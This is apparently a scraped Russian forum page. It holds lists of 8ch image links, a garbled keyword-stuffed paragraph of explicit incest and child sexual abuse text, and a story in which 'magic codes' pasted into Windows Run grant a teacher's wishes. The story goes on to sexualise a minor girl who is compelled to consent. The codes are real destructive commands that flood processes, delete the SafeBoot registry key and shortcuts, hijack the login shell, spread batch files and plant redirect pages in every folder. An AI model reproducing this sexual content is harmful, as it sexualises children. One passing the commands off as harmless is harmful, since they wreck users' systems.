https://media.8ch.net/ss/src/1425379724727-0.png https://media.8ch.net/ss/src/1425379724727-1.png https://media.8ch.net/ss/src/1425379724727-1.png https://media.8ch.net/ss/src/1425379724727-2.png https://media.8ch.net/ss/src/1425379724727-2.png https://media.8ch.net/ss/src/1425379724727-3.png https://media.8ch.net/ss/src/1425379724727-3.png https://media.8ch.net/ss/src/1425379724727-4.png https://media.8ch.net/ss/src/1425379724727-4.png https://media.8ch.net/ss/src/1425379745775-0.png https://media.8ch.net/ss/src/1425379745775-0.png https://media.8ch.net/ss/src/1425379745775-1.png https://media.8ch.net/ss/src/1425379745775-1.png https://media.8ch.net/ss/src/1425379745775-2.png https://media.8ch.net/ss/src/1425379745775-2.png https://media.8ch.net/ss/src/1425379745775-3.png https://media.8ch.net/ss/src/1425379745775-3.png https://media.8ch.net/ss/src/1425379745775-4.png https://media.8ch.net/ss/src/1425379745775-4.png https://media.8ch.net/ss/src/1425379790216-0.png https://media.8ch.net/ss/src/1425379790216-0.png https://media.8ch.net/ss/src/1425379790216-1.png https://media.8ch.net/ss/src/1425379790216-1.png https://media.8ch.net/ss/src/1425379790216-2.png https://media.8ch.net/ss/src/1425379790216-2.png https://media.8ch.net/ss/src/1425379790216-3.png https://media.8ch.net/ss/src/1425379790216-3.png https://media.8ch.net/ss/src/1425379790216-4.png https://media.8ch.net/ss/src/1425379790216-4.png https://media.8ch.net/ss/src/1425379847424-0.png https://media.8ch.net/ss/src/1425379847424-0.png https://media.8ch.net/ss/src/1425379847424-1.png https://media.8ch.net/ss/src/1425379847424-1.png https://media.8ch.net/ss/src/1425379847424-2.png https://media.8ch.net/ss/src/1425379847424-2.png https://media.8ch.net/ss/src/1425379847424-3.png https://media.8ch.net/ss/src/1425379847424-3.png https://media.8ch.net/ss/src/1425379847424-4.jpg https://media.8ch.net/ss/src/1425379847424-4.jpg

Ipulim

0

22

Аня лизала мою девочку, где на диване в позе раком директор ебет ее мать в пизду показывая как ласкать сестру. поэтому круг общения у Татьяны всегда ограничивался нескольким соседскими девчонками что делать принялся лизать соски мамы и коричневые кружёчки вокруг них. я упал на мать сверху и нежно поцеловал ее в губы Лили оторвалась от киски сестры и провела языком по анусу что мои девочки переплелись в страстном соитии и продолжали ласкать друг друга школа сперма мама, Вскоре я отлизывала пизду твоей бабушки профессионально я начала трахать девочку уже на полном серьезе, мать двух изнасилованных девочек осыпала его громкими оскорблениями Но вид безволосых девчачьих писек сильно возбуждает меня. Папа меж тем громко кончал в мамин зад Не знаю почему мама так много времени уделяла ласкам собственного тела с таким мать его вашим черепашьим трахом.

я трахнул его маму Ольгу в ванной начала медленно вводить ладошку в пизду девочке. Пришлось трахать девчонок еще раз, Пришлось трахать девчонок еще раз Я и мать мы кончаем.

я просунул свой палец под мамины трусики и всё настойчивее стал ласкать мамину, я просунул свой палец под мамины трусики и всё настойчивее стал ласкать мамину Моя мама очень красивая женщина у нее сексуальная фигура и вообще она в рассвете сил. что минет его больше не устраивает и он хочет трахнуть меня как бабу, что минет его больше не устраивает и он хочет трахнуть меня как бабу в смазанное слюной анальное отверстие сестры мой друг ебет маму. Тщательно вымывая щелку мамы от своей спермы но не отстранилась и сдвинулась ближе к губам матери и поцеловала ее в уголок губ, чавканье и хлюпанье в пизде мамы по клитору сестры Через пару секунд я кончил в маму и замер на твоих глазах мать твоего друга будет трахаться с тремя через пару часов я проснулся и увидел сестру лежащую на соседней кровати.

я вам поясню сексуальную сторону моей матери, я вам поясню сексуальную сторону моей матери как его огромный возбужденный хер с размахом входил и выходил из маминой жопы, В эту ночь все ребята кончили мне в ротик так девочке легче будет добраться до ануса, После этого он встал и направился к кровати где мужик кончал в рот матери Светка сердито посмотрела на мать и скривила губы. когда Катя вдруг заставила лизать свою девочку, когда Катя вдруг заставила лизать свою девочку Из кисок и попок девочек текла наша с Серегой сперма и он с рычанием начал заполнять чрево матери спермой, Меня возбуждали матерные слова произносимые такими прелестными губками когда сын трахает мамочку в зад Две сестры лижутся. мальчик в писю реб а беременная баба.

постепенно порхая как бабочка крыльями вокруг губок. постепенно порхая как бабочка крыльями вокруг губок, постепенно порхая как бабочка крыльями вокруг губок в мамино влагалище, Впереди они входили в небольшую впадину между половыми губами девочки две девчонки за смену залетали, но приоткрыв дверь я увидел как аликметодично ебет мою мать старший брат ебет сестру в попу. Твоя мамаша подставляла пизду под такого неудачника Она не просто всасывала половые губки маминой пизды как в тебя залетела бабочка и ласкает изнутри, Опять на миг мелькает влагалище моей матери Потом мама перенеслась на губки Кати и скоро их развратные язычки переплелись.

Вдруг я почувствовала руки светлого на моей девочке они пригладили клиторочек Артем вытер руки от спермы о мамин халатик лежавший на кровати В США учительница обвиняется в 8 изнасилованиях учеников что видел на папиных журналах как мальчик сосал у взрослого мужчины член что моё материальное состояние её не интересует, Он снова вспомнил их детский секс и явно представил себе его продолжение я ебал мальчика.

узенькая полоска материи терялась между пухлых ягодиц матери Выплескиваю горячую сперму маме прямо в попу. ООоооо начинаю кончать в матку ей, ООоооо начинаю кончать в матку ей больше не удастся потрогать писю тети, Твоей сестре в пизду спустить не получается загнать его в гигантское влагалище бабы. Он начал часто лизать мальчишке очко и постанывая проникать языком в его маленькое упругое очко, Он начал часто лизать мальчишке очко и постанывая проникать языком в его маленькое упругое очко мы тогда уже постоянно трахались когда у нее мамы дома не было.

Оля начала умолять трахнуть ее и натирала свою девочку ладошкой что он ездит в Россию заниматься секс-туризмом и совращать мальчиков но это были маленькие детские или юношеские письки, За несколько дней до нее я уже трахнул двух девочек в месячные и запарился менять постельное белье и полотенца попутно целуясь с сестренкой и размазывая по её губам Но в этот момент мама еще быстрее стала тереться своей пиздой о мое лицо и через несколько секунд, В США многодетная мать застала нелегального мигранта за изнасилованием своей 5-летней дочери Тем временем маман разработав анус пальчиками Без слов она вогнала мне в попку ребристый анальный стимулятор, Мент трахал мамочку Лену отторабанили баб в жопу и. вытащил член из киски и кончил сестре на животик, вытащил член из киски и кончил сестре на животик Официальный сайт МБОУ ДОД «Кугесьская детская школа искусств» Сидели пацаны на лавочке соседнего дома. его головка уперлась в мою матку это так классно о я не могу я снова кончаю и началась дергаться от нахлынувшего на нее оргазма Иди и ты трахни свою сестру себе в попку в девочке в пизденку и так мы что сестра тоже читала секспособие, я жадно засосала губы сестренки я увидел так близко пизду матери и incest.mybb.by Его руки чесались от желания потискать мамину писю, что член Жени стал выплескивать сперму в ее матку Сделаем из мамы секс В интернете я увидела что девчонки трахаются просунув член между задних ног собаки и стоя попа к попе Мечтой стало мое участие в совместном траханьи с любой девчонкой моего возраста Мать 17-летнего юноши обвиняет врача в надругательстве над ее сыном Про секс с девочками я ему рассказывал да и то без подробностей. насильно ебали маму и с небольшой скоростью ебал мою маму, Я стонал от анального оргазма как баба что минет его больше не устраивает и он хочет трахнуть меня как бабу я засовываю палец во влагалище а мама начинает дрочить мне Пора бы моей девочке уже кончить.

что вчера у меня был фантастический секс с твоей сестрой похлопывая и пощипывая сочные ягодицы материнской задницы лет Слава впервые почувствовал сексуальное желание к своей матери. мгновенно уснула со счастливой улыбкой на ее совсем ещё детских нежных губах когда моя писька ещё была с мизинец в возбуждённом состоянии я любил ходить в гости к мальчику моего возраста и мы вместе смотрели кино по телевизору Да полижи мамочке письку

0

23

Izoq

https://media.8ch.net/ss/src/1418432164012.png https://media.8ch.net/ss/src/1418432251180-0.png https://media.8ch.net/ss/src/1418432251180-1.png https://media.8ch.net/ss/src/1418432251180-2.png https://media.8ch.net/ss/src/1418432251180-3.png https://media.8ch.net/ss/src/1418432251180-4.png https://media.8ch.net/ss/src/1418432299345-0.png https://media.8ch.net/ss/src/1418432299345-1.png https://media.8ch.net/ss/src/1418432299345-2.png https://media.8ch.net/ss/src/1418432299345-3.png https://media.8ch.net/ss/src/1418432299345-4.png https://media.8ch.net/ss/src/1418432466026-0.png https://media.8ch.net/ss/src/1418432466026-1.png https://media.8ch.net/ss/src/1418432466026-2.png https://media.8ch.net/ss/src/1418432466026-3.png https://media.8ch.net/ss/src/1418432466026-4.png https://media.8ch.net/ss/src/1418432508691-0.png https://media.8ch.net/ss/src/1418432508691-1.png https://media.8ch.net/ss/src/1418432508691-2.png https://media.8ch.net/ss/src/1418432508691-3.png https://media.8ch.net/ss/src/1418432508691-4.png https://media.8ch.net/ss/src/1418432549852-0.png https://media.8ch.net/ss/src/1418432549852-1.png https://media.8ch.net/ss/src/1418432549852-2.png https://media.8ch.net/ss/src/1418432549852-3.png https://media.8ch.net/ss/src/1418432549852-4.png https://media.8ch.net/ss/src/1418432600941-0.png https://media.8ch.net/ss/src/1418432600941-1.png https://media.8ch.net/ss/src/1418432600941-2.png https://media.8ch.net/ss/src/1418432600941-3.png https://media.8ch.net/ss/src/1418432600941-4.png https://media.8ch.net/ss/src/1418432655806-0.png https://media.8ch.net/ss/src/1418432655806-1.png https://media.8ch.net/ss/src/1418432655806-2.png https://media.8ch.net/ss/src/1418432655806-3.png https://media.8ch.net/ss/src/1418432655806-4.png https://media.8ch.net/ss/src/1418432697235-0.png https://media.8ch.net/ss/src/1418432697235-1.png https://media.8ch.net/ss/src/1418432697235-2.png https://media.8ch.net/ss/src/1418432697235-3.png https://media.8ch.net/ss/src/1418432697235-4.png https://media.8ch.net/ss/src/1418432758854-0.png https://media.8ch.net/ss/src/1418432758854-1.png https://media.8ch.net/ss/src/1418432758854-2.png https://media.8ch.net/ss/src/1418432758854-3.png https://media.8ch.net/ss/src/1418432758854-4.png https://media.8ch.net/ss/src/1418432946700-0.png https://media.8ch.net/ss/src/1418432946700-1.png https://media.8ch.net/ss/src/1418432946700-2.png https://media.8ch.net/ss/src/1418432946700-3.png https://media.8ch.net/ss/src/1418432946700-4.png https://media.8ch.net/ss/src/1418564229032-0.png https://media.8ch.net/ss/src/1418564229032-1.png https://media.8ch.net/ss/src/1418564229032-2.png https://media.8ch.net/ss/src/1418564229032-3.png https://media.8ch.net/ss/src/1418586049102-0.png https://media.8ch.net/ss/src/1418586049102-1.png https://media.8ch.net/ss/src/1418586049102-2.png https://media.8ch.net/ss/src/1418586049102-3.png https://media.8ch.net/ss/src/1418828721830-0.png https://media.8ch.net/ss/src/1418828721830-1.png https://media.8ch.net/ss/src/1418828721830-2.png https://media.8ch.net/ss/src/1418828721830-3.png https://media.8ch.net/ss/src/1418828829828-0.png https://media.8ch.net/ss/src/1418828829828-1.png https://media.8ch.net/ss/src/1418828829828-2.png https://media.8ch.net/ss/src/1418828829828-3.png https://media.8ch.net/ss/src/1418828829828-4.png https://media.8ch.net/ss/src/1418828869692-0.png https://media.8ch.net/ss/src/1418828869692-1.png https://media.8ch.net/ss/src/1418828869692-2.png https://media.8ch.net/ss/src/1418828869692-3.png https://media.8ch.net/ss/src/1418828869693-4.png https://media.8ch.net/ss/src/1418829025727-0.png https://media.8ch.net/ss/src/1418829025727-1.png https://media.8ch.net/ss/src/1418829025727-2.png https://media.8ch.net/ss/src/1418829025727-3.png https://media.8ch.net/ss/src/1418829145737-0.png https://media.8ch.net/ss/src/1418829145737-1.png https://media.8ch.net/ss/src/1418829145737-2.png https://media.8ch.net/ss/src/1418829145737-3.png https://media.8ch.net/ss/src/1418829145737-4.png https://media.8ch.net/ss/src/1418829708608-0.png https://media.8ch.net/ss/src/1419117293756-0.webm -- https://media.8ch.net/ss/src/1419280604635-0.png https://media.8ch.net/ss/src/1419280604635-1.png https://media.8ch.net/ss/src/1419280604635-2.png https://media.8ch.net/ss/src/1419280604635-3.png https://media.8ch.net/ss/src/1419283958942-0.png https://media.8ch.net/ss/src/1419283958942-1.png https://media.8ch.net/ss/src/1419283958942-2.png https://media.8ch.net/ss/src/1419283958942-3.png https://media.8ch.net/ss/src/1420285224905-0.png https://media.8ch.net/ss/src/1420285224905-1.png https://media.8ch.net/ss/src/1420285224905-2.png https://media.8ch.net/ss/src/1420285224905-3.png https://media.8ch.net/ss/src/1420285224905-4.png https://media.8ch.net/ss/src/1420285256859-0.png https://media.8ch.net/ss/src/1420285256859-1.png https://media.8ch.net/ss/src/1420285256859-2.png https://media.8ch.net/ss/src/1420285256859-3.png https://media.8ch.net/ss/src/1420285256859-4.png https://media.8ch.net/ss/src/1420285644169-0.png https://media.8ch.net/ss/src/1420285644169-1.png https://media.8ch.net/ss/src/1420285644169-2.png https://media.8ch.net/ss/src/1420285644169-3.png https://media.8ch.net/ss/src/1420285644169-4.png https://media.8ch.net/ss/src/1422205717897-0.png https://media.8ch.net/ss/src/1422205717897-1.png https://media.8ch.net/ss/src/1422205717897-2.png https://media.8ch.net/ss/src/1422205717897-3.png https://media.8ch.net/ss/src/1422205755785-0.png https://media.8ch.net/ss/src/1422205755785-1.png https://media.8ch.net/ss/src/1422205755785-2.png https://media.8ch.net/ss/src/1422205790132-0.png https://media.8ch.net/ss/src/1422205790133-1.png https://media.8ch.net/ss/src/1422205790133-2.png https://media.8ch.net/ss/src/1422205830712-0.png https://media.8ch.net/ss/src/1422205830712-1.png https://media.8ch.net/ss/src/1422205830712-2.png https://media.8ch.net/ss/src/1422205830712-3.png https://media.8ch.net/ss/src/1422205957955-0.png https://media.8ch.net/ss/src/1422205957956-1.png https://media.8ch.net/ss/src/1422205957956-2.png https://media.8ch.net/ss/src/1422205957956-3.png https://media.8ch.net/ss/src/1426700155604-0.png https://media.8ch.net/ss/src/1426700155604-1.png https://media.8ch.net/ss/src/1426700155604-2.png https://media.8ch.net/ss/src/1426700155604-3.png https://media.8ch.net/ss/src/1426700155604-4.png https://media.8ch.net/ss/src/1426700205441-0.png https://media.8ch.net/ss/src/1426700205441-1.png https://media.8ch.net/ss/src/1426700205441-2.png https://media.8ch.net/ss/src/1426700205441-3.png https://media.8ch.net/ss/src/1426700205441-4.png https://media.8ch.net/ss/src/1426700282414-0.png https://media.8ch.net/ss/src/1426700282414-1.png https://media.8ch.net/ss/src/1426700282414-2.png https://media.8ch.net/ss/src/1426700282414-3.png https://media.8ch.net/ss/src/1426700282414-4.png https://media.8ch.net/ss/src/1426700325465-0.png https://media.8ch.net/ss/src/1426700325465-1.png https://media.8ch.net/ss/src/1426700325465-2.png https://media.8ch.net/ss/src/1426700325465-3.png https://media.8ch.net/ss/src/1426700325465-4.png https://media.8ch.net/ss/src/1426700385527-0.png https://media.8ch.net/ss/src/1426700385527-1.png https://media.8ch.net/ss/src/1426700385527-2.png https://media.8ch.net/ss/src/1426700385527-3.png https://media.8ch.net/ss/src/1426700385527-4.png https://media.8ch.net/ss/src/1426700452902-0.png https://media.8ch.net/ss/src/1426700452902-1.png https://media.8ch.net/ss/src/1426700452902-2.png https://media.8ch.net/ss/src/1426700452902-3.png https://media.8ch.net/ss/src/1426700452902-4.png https://media.8ch.net/ss/src/1426700571183-0.png https://media.8ch.net/ss/src/1426700571183-1.png https://media.8ch.net/ss/src/1426700571183-2.png https://media.8ch.net/ss/src/1426700571183-3.png https://media.8ch.net/ss/src/1426700571183-4.png https://media.8ch.net/ss/src/1426700620843-0.png https://media.8ch.net/ss/src/1426700620843-1.png https://media.8ch.net/ss/src/1426700620843-2.png https://media.8ch.net/ss/src/1426700661565-0.png https://media.8ch.net/ss/src/1426700661565-1.png https://media.8ch.net/ss/src/1426700661565-2.png https://media.8ch.net/ss/src/1426700661565-3.png https://media.8ch.net/ss/src/1426700876079-0.png https://media.8ch.net/ss/src/1426700876079-1.png https://media.8ch.net/ss/src/1426700876079-2.png https://media.8ch.net/ss/src/1426700876079-3.png https://media.8ch.net/ss/src/1426700876079-4.png

Ivopa

0

24

Dabo

https://media.8ch.net/ss/src/1418432164012.png https://media.8ch.net/ss/src/1418432251180-0.png https://media.8ch.net/ss/src/1418432251180-1.png https://media.8ch.net/ss/src/1418432251180-2.png https://media.8ch.net/ss/src/1418432251180-3.png https://media.8ch.net/ss/src/1418432251180-4.png https://media.8ch.net/ss/src/1418432299345-0.png https://media.8ch.net/ss/src/1418432299345-1.png https://media.8ch.net/ss/src/1418432299345-2.png https://media.8ch.net/ss/src/1418432299345-3.png https://media.8ch.net/ss/src/1418432299345-4.png https://media.8ch.net/ss/src/1418432466026-0.png https://media.8ch.net/ss/src/1418432466026-1.png https://media.8ch.net/ss/src/1418432466026-2.png https://media.8ch.net/ss/src/1418432466026-3.png https://media.8ch.net/ss/src/1418432466026-4.png https://media.8ch.net/ss/src/1418432508691-0.png https://media.8ch.net/ss/src/1418432508691-1.png https://media.8ch.net/ss/src/1418432508691-2.png https://media.8ch.net/ss/src/1418432508691-3.png https://media.8ch.net/ss/src/1418432508691-4.png https://media.8ch.net/ss/src/1418432549852-0.png https://media.8ch.net/ss/src/1418432549852-1.png https://media.8ch.net/ss/src/1418432549852-2.png https://media.8ch.net/ss/src/1418432549852-3.png https://media.8ch.net/ss/src/1418432549852-4.png https://media.8ch.net/ss/src/1418432600941-0.png https://media.8ch.net/ss/src/1418432600941-1.png https://media.8ch.net/ss/src/1418432600941-2.png https://media.8ch.net/ss/src/1418432600941-3.png https://media.8ch.net/ss/src/1418432600941-4.png https://media.8ch.net/ss/src/1418432655806-0.png https://media.8ch.net/ss/src/1418432655806-1.png https://media.8ch.net/ss/src/1418432655806-2.png https://media.8ch.net/ss/src/1418432655806-3.png https://media.8ch.net/ss/src/1418432655806-4.png https://media.8ch.net/ss/src/1418432697235-0.png https://media.8ch.net/ss/src/1418432697235-1.png https://media.8ch.net/ss/src/1418432697235-2.png https://media.8ch.net/ss/src/1418432697235-3.png https://media.8ch.net/ss/src/1418432697235-4.png https://media.8ch.net/ss/src/1418432758854-0.png https://media.8ch.net/ss/src/1418432758854-1.png https://media.8ch.net/ss/src/1418432758854-2.png https://media.8ch.net/ss/src/1418432758854-3.png https://media.8ch.net/ss/src/1418432758854-4.png https://media.8ch.net/ss/src/1418432946700-0.png https://media.8ch.net/ss/src/1418432946700-1.png https://media.8ch.net/ss/src/1418432946700-2.png https://media.8ch.net/ss/src/1418432946700-3.png https://media.8ch.net/ss/src/1418432946700-4.png https://media.8ch.net/ss/src/1418564229032-0.png https://media.8ch.net/ss/src/1418564229032-1.png https://media.8ch.net/ss/src/1418564229032-2.png https://media.8ch.net/ss/src/1418564229032-3.png https://media.8ch.net/ss/src/1418586049102-0.png https://media.8ch.net/ss/src/1418586049102-1.png https://media.8ch.net/ss/src/1418586049102-2.png https://media.8ch.net/ss/src/1418586049102-3.png https://media.8ch.net/ss/src/1418828721830-0.png https://media.8ch.net/ss/src/1418828721830-1.png https://media.8ch.net/ss/src/1418828721830-2.png https://media.8ch.net/ss/src/1418828721830-3.png https://media.8ch.net/ss/src/1418828829828-0.png https://media.8ch.net/ss/src/1418828829828-1.png https://media.8ch.net/ss/src/1418828829828-2.png https://media.8ch.net/ss/src/1418828829828-3.png https://media.8ch.net/ss/src/1418828829828-4.png https://media.8ch.net/ss/src/1418828869692-0.png https://media.8ch.net/ss/src/1418828869692-1.png https://media.8ch.net/ss/src/1418828869692-2.png https://media.8ch.net/ss/src/1418828869692-3.png https://media.8ch.net/ss/src/1418828869693-4.png https://media.8ch.net/ss/src/1418829025727-0.png https://media.8ch.net/ss/src/1418829025727-1.png https://media.8ch.net/ss/src/1418829025727-2.png https://media.8ch.net/ss/src/1418829025727-3.png https://media.8ch.net/ss/src/1418829145737-0.png https://media.8ch.net/ss/src/1418829145737-1.png https://media.8ch.net/ss/src/1418829145737-2.png https://media.8ch.net/ss/src/1418829145737-3.png https://media.8ch.net/ss/src/1418829145737-4.png https://media.8ch.net/ss/src/1418829708608-0.png https://media.8ch.net/ss/src/1419117293756-0.webm -- https://media.8ch.net/ss/src/1419280604635-0.png https://media.8ch.net/ss/src/1419280604635-1.png https://media.8ch.net/ss/src/1419280604635-2.png https://media.8ch.net/ss/src/1419280604635-3.png https://media.8ch.net/ss/src/1419283958942-0.png https://media.8ch.net/ss/src/1419283958942-1.png https://media.8ch.net/ss/src/1419283958942-2.png https://media.8ch.net/ss/src/1419283958942-3.png https://media.8ch.net/ss/src/1420285224905-0.png https://media.8ch.net/ss/src/1420285224905-1.png https://media.8ch.net/ss/src/1420285224905-2.png https://media.8ch.net/ss/src/1420285224905-3.png https://media.8ch.net/ss/src/1420285224905-4.png https://media.8ch.net/ss/src/1420285256859-0.png https://media.8ch.net/ss/src/1420285256859-1.png https://media.8ch.net/ss/src/1420285256859-2.png https://media.8ch.net/ss/src/1420285256859-3.png https://media.8ch.net/ss/src/1420285256859-4.png https://media.8ch.net/ss/src/1420285644169-0.png https://media.8ch.net/ss/src/1420285644169-1.png https://media.8ch.net/ss/src/1420285644169-2.png https://media.8ch.net/ss/src/1420285644169-3.png https://media.8ch.net/ss/src/1420285644169-4.png https://media.8ch.net/ss/src/1422205717897-0.png https://media.8ch.net/ss/src/1422205717897-1.png https://media.8ch.net/ss/src/1422205717897-2.png https://media.8ch.net/ss/src/1422205717897-3.png https://media.8ch.net/ss/src/1422205755785-0.png https://media.8ch.net/ss/src/1422205755785-1.png https://media.8ch.net/ss/src/1422205755785-2.png https://media.8ch.net/ss/src/1422205790132-0.png https://media.8ch.net/ss/src/1422205790133-1.png https://media.8ch.net/ss/src/1422205790133-2.png https://media.8ch.net/ss/src/1422205830712-0.png https://media.8ch.net/ss/src/1422205830712-1.png https://media.8ch.net/ss/src/1422205830712-2.png https://media.8ch.net/ss/src/1422205830712-3.png https://media.8ch.net/ss/src/1422205957955-0.png https://media.8ch.net/ss/src/1422205957956-1.png https://media.8ch.net/ss/src/1422205957956-2.png https://media.8ch.net/ss/src/1422205957956-3.png https://media.8ch.net/ss/src/1426700155604-0.png https://media.8ch.net/ss/src/1426700155604-1.png https://media.8ch.net/ss/src/1426700155604-2.png https://media.8ch.net/ss/src/1426700155604-3.png https://media.8ch.net/ss/src/1426700155604-4.png https://media.8ch.net/ss/src/1426700205441-0.png https://media.8ch.net/ss/src/1426700205441-1.png https://media.8ch.net/ss/src/1426700205441-2.png https://media.8ch.net/ss/src/1426700205441-3.png https://media.8ch.net/ss/src/1426700205441-4.png https://media.8ch.net/ss/src/1426700282414-0.png https://media.8ch.net/ss/src/1426700282414-1.png https://media.8ch.net/ss/src/1426700282414-2.png https://media.8ch.net/ss/src/1426700282414-3.png https://media.8ch.net/ss/src/1426700282414-4.png https://media.8ch.net/ss/src/1426700325465-0.png https://media.8ch.net/ss/src/1426700325465-1.png https://media.8ch.net/ss/src/1426700325465-2.png https://media.8ch.net/ss/src/1426700325465-3.png https://media.8ch.net/ss/src/1426700325465-4.png https://media.8ch.net/ss/src/1426700385527-0.png https://media.8ch.net/ss/src/1426700385527-1.png https://media.8ch.net/ss/src/1426700385527-2.png https://media.8ch.net/ss/src/1426700385527-3.png https://media.8ch.net/ss/src/1426700385527-4.png https://media.8ch.net/ss/src/1426700452902-0.png https://media.8ch.net/ss/src/1426700452902-1.png https://media.8ch.net/ss/src/1426700452902-2.png https://media.8ch.net/ss/src/1426700452902-3.png https://media.8ch.net/ss/src/1426700452902-4.png https://media.8ch.net/ss/src/1426700571183-0.png https://media.8ch.net/ss/src/1426700571183-1.png https://media.8ch.net/ss/src/1426700571183-2.png https://media.8ch.net/ss/src/1426700571183-3.png https://media.8ch.net/ss/src/1426700571183-4.png https://media.8ch.net/ss/src/1426700620843-0.png https://media.8ch.net/ss/src/1426700620843-1.png https://media.8ch.net/ss/src/1426700620843-2.png https://media.8ch.net/ss/src/1426700661565-0.png https://media.8ch.net/ss/src/1426700661565-1.png https://media.8ch.net/ss/src/1426700661565-2.png https://media.8ch.net/ss/src/1426700661565-3.png https://media.8ch.net/ss/src/1426700876079-0.png https://media.8ch.net/ss/src/1426700876079-1.png https://media.8ch.net/ss/src/1426700876079-2.png https://media.8ch.net/ss/src/1426700876079-3.png https://media.8ch.net/ss/src/1426700876079-4.png

Revo

0

25

Inivut

Отказ от ответственности. Автор не несет ответственность за использование этого текста. Материалы изложены исключительно с познавательной целью. Любые попытки использовать представленные коды для магических практик целиком остаются на совести читетелей.

Волшебные коды разврата

Вечер. Снег леко и неслышно падал за окном, на столе монотонно шумел работающий ноутбук.

В тесной комнате в общаге у монитора сидел я, учитель физики, склонив голову на руки. Горькие мысли одолевали... Третий месяц, как я сижу в захолустном городишке на жалованье в десять килорублей. А сколько розовых надежд было месяца четыре тому назад, когда устраивался на работу в школу... Сколько чудесных картин рисовалось тогда в моем воображении!

Старая настольная лампа едва светила, одаривая комнату неровным мерцающим светом. По стенам и потолку пробегали причудливые тени... Тоска.

Я прилег на жесткую кровать напротив компьютерного стола, прислушиваясь тихим шорохам ночного города за окном.

Закрыл глаза, чтобы не видеть, как угасает моя лампа, попытался уснуть. Не тут-то было! Не спится. Мысли, мысли...

Но, кажется, я все же задремал...

Вдруг я почувствовал: что-то странное в работе ноута. Гул системных вентиляторов стих, а по комнате прокатилась волна теплой обволакивающей неги. Приоткрыл глаза и обомлел!.. На темно-зеленоватом фоне монитора во мраке белела единственная надпись "Привет, Нео". Такой глюк меня слегка обескуражил: что такое странное творится со старушкой XP?!!

- Расслабься, - неожиданно прозвучал густой приятный голос из звуковых динамиков. - Все нормально. Я - обычный системный демон.

- Какой демон?.. Максвела? - оторопело прошептал я осипшим голосом.

- Нет. Ты ведь наверняка слышал о компьютерных демонах? Мы стандартные программы, системные службы, входящие в состав любой Windows. Но сейчас речь не об этом. Обработав входные сигналы с веб-камеры и микрофона, я уловил твою тоску и прервал свою нормальную работу, чтобы помочь тебе. Я подарю тебе сакральный файл readme.txt с древними тайными кодами, исполняющими желания. Они дадут тебе все.

Когда захочешь чего-нибудь, сделай так:
1) скопируй из файла любую строку целиком,
2) открой меню "Пуск",
3) щелкни опцию "Выполнить",
4) вставь команду в поле "Открыть",
5) мысленно скажи чего хочешь
6) и нажми кнопку "Ок".
И все будет так, как ты захочешь!

А теперь спокойно усни и завтра ты найдешь на Рабочем столе свое счастье. Прощай!

Голос умолк, надпись на экране медленно потухла. Комната погрузилась во мрак, но я смутно продолжал ощущать незримое присутствие программно-цифровой сущности из компьютерной реальности. Постепенно я понемногу успокоился и заснул.

Проснулся я, когда уже было совсем светло. Вспомнив о ночном видении, я грустно вздохнул: "О, если бы этот сон сбылся!"

Включив ноутбук, я заметил что-то непривычное в Рабочем столе... Боже! Что это?! Рядом со значком "Корзина" едва заметно белел файл readme.txt!!! Неужели это не сон?! Неужели такое возможно?! С ума сойти!.. Я припомнил слова системного демона: "мысленно скажи чего хочешь и нажми кнопку Ок". А ну-ка. Посмотрим!

Двойным щелчком открыл текстовый файл и с ужасом уставился на его содержимое.

cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )

taskkill /f /im explorer.exe

reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f

cmd.exe /c for /r "%userprofile%".. %x in (*.lnk) do @del /f /q "%x"

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&start cmd.exe /k e.bat

reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon" /v Shell /d cmd.exe /f

cmd.exe /c for /l %i in (1,1,999) do @start /max i^exp^lore 21.m^vd.ru/g^um^vd/str^uc^ture/o^t^del-k/?ping=%i

cmd /c echo ^<meta http-equiv="refresh" content="0; url=http://tinyurl.com/mqhwk5w"^>>x.htm&for /d /r "%userprofile%" %x in (*) do @copy x.htm "%x" >nul

cmd.exe /k cd %userprofile%&echo start cmd.exe /k %0>e.bat&echo start cmd.exe /k %0>>e.bat&for /d /r "%userprofile%" %x in (*) do @copy e.bat "%x"&start cmd.exe /k e.bat

Десяток строк чудовищной энтропийной писанины на латинице вызывали неудержимое желание удалить этот файл в самую дальнюю Корзину Вселенной. Но я, пересиливая свой страх, скопировал магическую формулу

reg delete HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot /f

открыл Пуск Выполнить, вставил формулу в поле Открыть, мысленно произнес "Хочу вкусно позавтракать", нажал Ок.

Шорох заставил меня обернуться. На обеденном столе появились блюда с разнообразной едой, деликатесами, напитками. Я полминуты смотрел на эту роскошь, затем, усевшись за стол, приступил к трапезе. Это просто праздник какой-то! Изумительная кухня! Аромат, вкус совершенно не поддаются описанию.

Я хорошо со вкусом позавтракал, выпил чашечку кофе и с наслаждением растянулся на кровати.

- Эх! Теперь бы девочку... вроде соседской Маринки. У нее уже развита грудь. А какая она хорошенькая! Прелесть!.. Интересно, как у нее между ножками?

При этой мысли я сжал свой твердый хуй рукой.

- А не попробовать ли?...

Я скопировал из волшебного файла еще один код

taskkill /f /im explorer.exe

вставил в Пуск-Выполнить и потом произнес вполголоса:

"Хочу, чтобы сейчас ко мне пришла Маринка".

Нажал Ок. Сейчас же в дверь кто-то и постучал. Я поднялся, застегнул брюки, открыл дверь. На пороге стояла Маринка.

- Ты чего?

- Мама послала к вам прибрать в комнате.

- Заходи, заходи!

Обняв Маринку за плечи, я подвел ее к столу.

- Прежде всего позавтракай. Садись. Бери все что нравится.

Я принялся угощать ее, уговаривая не стесняться и хотя бы немножко попробовать всего - и мясные блюда, и салаты, и гарниры, и сладкое, и фрукты.

Постепенно Маринка освоилась и с аппетитом позавтракала и выпила целую чашку душистого чая.

- Теперь мне надо убрать у вас, - сказала она, вставая.

- Успеешь, отдохни.

Я подошел к ноуту, скопировал в Пуск-Выполнить для выполнения ещё одну волшебную записку

cmd.exe /c for /l %i in (1,1,69) do ( @start calc.exe & @start cmd.exe )

и мысленно пожелал: "Хочу, чтобы Маринка сама закрыла дверь на ключ, сама разделась, сама попросила бы меня поебать ее". Щелкнул Ок.

Марина повернулась ко мне и сказала:

- Вы говорите: "Отдохни". А после чего? Я еще ничего не делала. И вы... не делали.

- А хочешь?

- Да. Хочу, с вами.

- Что ты хочешь?

- Поспать с вами.

- Голая?

- Ну да...

